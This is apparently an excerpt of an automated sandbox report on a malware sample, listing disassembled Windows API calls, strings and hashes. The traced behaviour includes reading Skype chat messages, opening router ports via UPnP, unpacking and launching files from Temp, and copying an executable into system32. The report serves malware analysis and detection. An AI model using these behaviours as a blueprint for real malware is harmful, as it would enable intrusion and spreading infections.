                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4151D671604288EFEB21DFA4DC49FDA37ADAB04300F840067FB00931A1E76DA998C799
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,?), ref: 00413FA3
                                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00413FAA
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00413FB4
                                                                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,.exe), ref: 00413FD1
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00413FD9
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00413FE0
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004140BE
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast$ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                                                                                                                      • String ID: .exe
                                                                                                                                                                                                                                                      • API String ID: 3182025614-4119554291
                                                                                                                                                                                                                                                      • Opcode ID: 1de395bec982ee16d1ba774764177e0ec6cf3ca332c2e473e0865e044f3a2139
                                                                                                                                                                                                                                                      • Instruction ID: a25941590cff0d4bff0b9fb00928191c2ec88986d9cc0e69d77e81c5d1198593
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1de395bec982ee16d1ba774764177e0ec6cf3ca332c2e473e0865e044f3a2139
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92315071A00218BBDF209FE1DC48FDE7B7CEF08744F540066F605E2160DB7999959B69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00411E3A
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00411EA6
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00411ED5
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00411F3D
                                                                                                                                                                                                                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00411FA8
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00411FC5
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000), ref: 00411FE7
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A8E4), ref: 00412025
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A8E0), ref: 00412045
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A4D8), ref: 00412065
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,0042A8DC), ref: 00412085
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 004120A7
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00411AE2,?,00000000,00000000), ref: 004120E2
                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 004120EF
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000005), ref: 004120FC
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcat$CountCreateSleepThreadTickclosesocketioctlsocketlstrcpy
                                                                                                                                                                                                                                                      • String ID: Windows NT$e$p
                                                                                                                                                                                                                                                      • API String ID: 2122314254-1515810721
                                                                                                                                                                                                                                                      • Opcode ID: 9f5afbe7da503b74f3a21414e0dee05916b6baa10176548eaec83a6ef007bd99
                                                                                                                                                                                                                                                      • Instruction ID: 758467fef339c16e7423ce7124ac91e20933f26738648504c762f9c6b46ecbdf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f5afbe7da503b74f3a21414e0dee05916b6baa10176548eaec83a6ef007bd99
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3CA14A71908398AEEF21C7F4D9087EF7FA55B06304F54409BD641D62A2C7BD898AC36E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,0045B918,00000000), ref: 0041DBDD
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000001), ref: 0041DC07
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,TIMESTAMP), ref: 0041DC34
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,PARTNER_HANDLE), ref: 0041DC53
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,FROM_HANDLE), ref: 0041DC65
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,BODY), ref: 0041DC77
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(-00000005), ref: 0041DCA8
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,STATUS), ref: 0041DD4C
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0041DD5E
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,CHATNAME), ref: 0041DD7A
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0041DDA6
                                                                                                                                                                                                                                                        • Part of subcall function 0041D048: EnterCriticalSection.KERNEL32(0045B020), ref: 0041D055
                                                                                                                                                                                                                                                        • Part of subcall function 0041D048: lstrlenA.KERNEL32(?), ref: 0041D066
                                                                                                                                                                                                                                                        • Part of subcall function 0041D048: SendMessageA.USER32(0000004A,00000000), ref: 0041D082
                                                                                                                                                                                                                                                        • Part of subcall function 0041D048: LeaveCriticalSection.KERNEL32(0045B020), ref: 0041D092
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcmp$lstrlen$CriticalSectionwsprintf$EnterLeaveMessageSend
                                                                                                                                                                                                                                                      • String ID: @$$$#$BODY$CHATNAME$FROM_HANDLE$GET CHAT %s CHATMESSAGES$GET CHATMESSAGE %s CHATNAME$PARTNER_HANDLE$STATUS$TIMESTAMP
                                                                                                                                                                                                                                                      • API String ID: 2727930084-3421402773
                                                                                                                                                                                                                                                      • Opcode ID: 1b047a4dfee4784dd052a87f6609db79e305b1c6ad2939457b7c2989d155f736
                                                                                                                                                                                                                                                      • Instruction ID: 62f5e45808a0188c20558a68f814bf0c68f6b0cd72be060988d6f4810d27591e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b047a4dfee4784dd052a87f6609db79e305b1c6ad2939457b7c2989d155f736
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD51C7B1D0421AABDF216F75ED41ADB3BA9AF04348F24002BFD1092153EB7DD491CBA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • UuidCreate.RPCRT4(?), ref: 0041F126
                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0041F12E
                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000), ref: 0041F138
                                                                                                                                                                                                                                                      • UuidToStringA.RPCRT4(?,?), ref: 0041F160
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(0045B060,Skype-API-Test-), ref: 0041F170
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(0045B060,?), ref: 0041F17A
                                                                                                                                                                                                                                                      • RegisterClassA.USER32(?), ref: 0041F1AF
                                                                                                                                                                                                                                                      • RpcStringFreeA.RPCRT4(?), ref: 0041F1C2
                                                                                                                                                                                                                                                      • CreateWindowExA.USER32(00040100,0045B060,0042A774,008A0000,80000000,80000000,00000080,00000080,00000000,00000000,00000000), ref: 0041F1EF
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 0041F205
                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 0041F217
                                                                                                                                                                                                                                                      • UpdateWindow.USER32 ref: 0041F223
                                                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 0041F24C
                                                                                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 0041F256
                                                                                                                                                                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041F263
                                                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 0041F26F
                                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 0041F27B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageWindow$CreateProcessStringUuid$ClassCloseCurrentDestroyDispatchFreeHandleOpenPostQuitRegisterShowTranslateUpdatelstrcatlstrcpy
                                                                                                                                                                                                                                                      • String ID: Skype-API-Test-
                                                                                                                                                                                                                                                      • API String ID: 2123903928-1726473886
                                                                                                                                                                                                                                                      • Opcode ID: 97b09e785e71b3f4a5f55a6a2b6226b571743e998e104d3d4376831c1d4f3907
                                                                                                                                                                                                                                                      • Instruction ID: c071033c080b5f794f024b98cb63a98bfa1b0a9c90cff00eee41faaffcfe273b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97b09e785e71b3f4a5f55a6a2b6226b571743e998e104d3d4376831c1d4f3907
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A4186B1905348EFDB109FA4EC88AEE7F7CFB05351F504076F905E2260D739899A8B69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00406F8B
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\), ref: 00406FF5
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 00407003
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00407009
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040702C
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?), ref: 0040704D
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000000), ref: 00407057
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00407082
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 004070A0
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000), ref: 004070AB
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004070B2
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004070CE
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,00000000,00459550,?,00000000,00000000), ref: 004070E7
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 004070F2
                                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 004070FF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00406FE8
                                                                                                                                                                                                                                                      • c -y -tk -inul -z"%s" "%s", xrefs: 004070C8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$File$CloseCountCreateDeleteExecuteHandleShellSleepTickWritelstrcatlstrcpywsprintf
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$c -y -tk -inul -z"%s" "%s"
                                                                                                                                                                                                                                                      • API String ID: 2375108909-3982193107
                                                                                                                                                                                                                                                      • Opcode ID: ba2379b44126e0aa66cc29e4233b61f044a645cf7b630842926eaf073d4f1dc3
                                                                                                                                                                                                                                                      • Instruction ID: 9a316682a3d2def7cf7c719e22a0b18fcbdaeeb4e91003807991d1a23ff78275
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba2379b44126e0aa66cc29e4233b61f044a645cf7b630842926eaf073d4f1dc3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B41EB7290012CBBDB219B64DC48FDA7B6CDF15310F4040B6F609E2181DA749B95CFBA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00416C2F: wsprintfA.USER32 ref: 00416C44
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?,00417108,0042A774,?,TCP,?,00000000,?,?,?,?,?,?,76AF23A0), ref: 00416EDF
                                                                                                                                                                                                                                                        • Part of subcall function 00416C4E: wsprintfA.USER32 ref: 00416C63
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00416F08
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00416F2F
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00416F58
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00416F7F
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00416FA6
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00416FCF
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00416FF6
                                                                                                                                                                                                                                                        • Part of subcall function 00416C6D: lstrlenA.KERNEL32(00459868,76AE8A60,00000000,?,00417010,AddPortMapping,?,?), ref: 00416C88
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcat$wsprintf$lstrlen
                                                                                                                                                                                                                                                      • String ID: AddPortMapping$NewEnabled$NewExternalPort$NewInternalClient$NewInternalPort$NewLeaseDuration$NewPortMappingDescription$NewProtocol$NewRemoteHost
                                                                                                                                                                                                                                                      • API String ID: 2282776841-2883451938
                                                                                                                                                                                                                                                      • Opcode ID: d5dce4e9297c9ae454299d65d50d695627fd475a9dbdb8d640b0a2fc25fc757a
                                                                                                                                                                                                                                                      • Instruction ID: a75afadfc8a632f89c4ca1dff84ad90e4702995f5f3435f5538cee90814991ea
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5dce4e9297c9ae454299d65d50d695627fd475a9dbdb8d640b0a2fc25fc757a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1041AFF6D4012CAADB10DA91DC45FEE776DEB08204F45009BBB09E2044EA789B958FA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00406DB5
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\), ref: 00406E1F
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,?), ref: 00406E2D
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00406E33
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00406E56
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00406E7B
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,00000000,00459550,?,00000000,00000000), ref: 00406E96
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 00406EA1
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406ED3
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?), ref: 00406EF5
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000000), ref: 00406EFF
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(?,?,00000100,?,00000000), ref: 00406F25
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00406F35
                                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 00406F68
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • cw -y -tk -inul "%s" "%s", xrefs: 00406E75
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00406E12
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$File$CloseCountCreateDeleteExecuteHandleReadShellSleepTicklstrcatlstrcpywsprintf
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$cw -y -tk -inul "%s" "%s"
                                                                                                                                                                                                                                                      • API String ID: 3644005355-2241597656
                                                                                                                                                                                                                                                      • Opcode ID: 6d94c83798d181f0f8b7ed1e0a5c63ca31bdc8eacf9301aeb40c0452defbd603
                                                                                                                                                                                                                                                      • Instruction ID: 3fb23b9ecfadf165ffe6f97d1382b838028428942ad38c43b7683c9147d43c19
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d94c83798d181f0f8b7ed1e0a5c63ca31bdc8eacf9301aeb40c0452defbd603
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE51757290021CBBDF219BA4DC49FDA7BBCAB48314F5004AAF605A2190DB749BD5CB69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\), ref: 0040D32E
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040D335
                                                                                                                                                                                                                                                        • Part of subcall function 004136FF: lstrlenA.KERNEL32(4941262305804196,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,0040C034,?,00000000,0040D80A), ref: 00413708
                                                                                                                                                                                                                                                        • Part of subcall function 00413663: lstrlenA.KERNEL32(4941262305804196,?,?,00000000), ref: 00413691
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.exe), ref: 0040D35D
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040D380
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Windows\system32\), ref: 0040D3A8
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040D3AF
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,.exe), ref: 0040D3CF
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040D3F2
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\), ref: 0040D41C
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040D423
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,.exe), ref: 0040D443
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 0040D466
                                                                                                                                                                                                                                                        • Part of subcall function 00414787: EnumProcesses.PSAPI(?,00001000,Oa@,?,0040614F,svchost.exe,0040D4DF), ref: 004147BA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
